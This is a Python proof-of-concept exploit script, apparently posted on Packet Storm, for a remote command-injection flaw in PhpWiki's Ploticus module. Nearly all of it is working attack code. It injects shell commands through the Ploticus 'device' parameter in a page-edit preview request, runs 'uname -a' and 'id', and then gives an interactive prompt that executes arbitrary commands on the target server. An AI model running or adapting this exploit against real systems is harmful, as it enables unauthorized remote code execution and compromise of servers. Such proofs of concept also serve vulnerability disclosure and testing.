Proof of concept exploit for PhpWiki that demonstrates a remote command injection vulnerability via the Ploticus module.
0537e551a6510f8813c0b1364ed2c664f69c09d7a2daea939ae50369296e203f###############################################################
# ____ __ _ __ _
# / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_)
# / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ /
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /
#/_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/
# /_/ /_/ /_/
# Diskovered in Nov/Dec 2011
###############################################################
import urllib
import urllib2
import sys
def banner():
print " ____ __ _ __ _ "
print " / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_)"
print " / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
print " / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / / "
print " /_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ "
print " /_/ /_/ /_/ \n"
def usage():
banner()
print " [+] Usage example"
print " [-] python " + sys.argv[0] + " http://path.to/wiki"
if len(sys.argv)< 2:
usage()
quit()
domain = sys.argv[1]
def commandexec(cmd):
data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
cmd2 = urllib2.urlopen(cmd1)
output = cmd2.read()
firstloc = output.find("123:::\n") + len("123:::\n")
secondloc = output.find("\n:::123")
return output[firstloc:secondloc]
banner()
print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
cmd = raw_input('Run a command: ')
if cmd == 'quit':
print "[-] Hope you had fun :)"
quit = 1
if cmd != 'quit':
print commandexec(cmd)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed